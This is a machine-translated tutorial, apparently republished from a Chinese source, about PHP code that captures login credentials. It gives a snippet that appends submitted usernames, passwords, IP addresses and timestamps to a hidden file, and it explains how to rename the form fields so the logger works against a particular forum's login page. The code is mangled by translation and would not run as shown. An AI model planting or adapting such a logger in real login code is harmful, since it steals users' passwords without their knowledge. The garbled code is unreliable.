Php intercepts the background login password code. many times hackers leave this code. you must pay attention to if ($ _ POST [loginsubmit]! =) {// Determine whether the login button is clicked
$ Sb = user :. $ _ POST [username]. -- passwd :. $ _ POST [password]. -- ip :. $ HTTP_SERVER_VARS [REMOTE_ADDR]. --. date (Y-m-d H: I: s ). rn; // concatenate the value received by POST and assign the value to the variable $ sb.
Fwrite(fopen(robot.txt, AB), $ sb);} // write the result into a file
The following is a brief analysis. the login page of China is used as an example. Right-click bbs.xxx.com/login.php and right-click it to view the source code. press CTRL + F to search for action and find the login form.
I only copied the key code.
// The value after the action is the address submitted by the form, which will process login. for example, to determine whether the password is correct or not, the method is POST, so it is received with $ _ POST.
.... Powerful ellipsis ......
Account (
U):
Class = input id = pwuser accessKey = u size = 16
Name = pwuser>// Input box of the user name. Note that the value of the user name corresponds to $ _ POST [username]. to intercept the Chinese password, change it to $ _ POST [pwuser].
Password (
P):
Class = input id = pwpwd accessKey = p
Type = password size = 16 name = pwpwd>// Input box of the user name. Note that the value of the user name corresponds to $ _ POST [username]. to intercept the Chinese password, change it to $ _ POST [pwpwd].
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.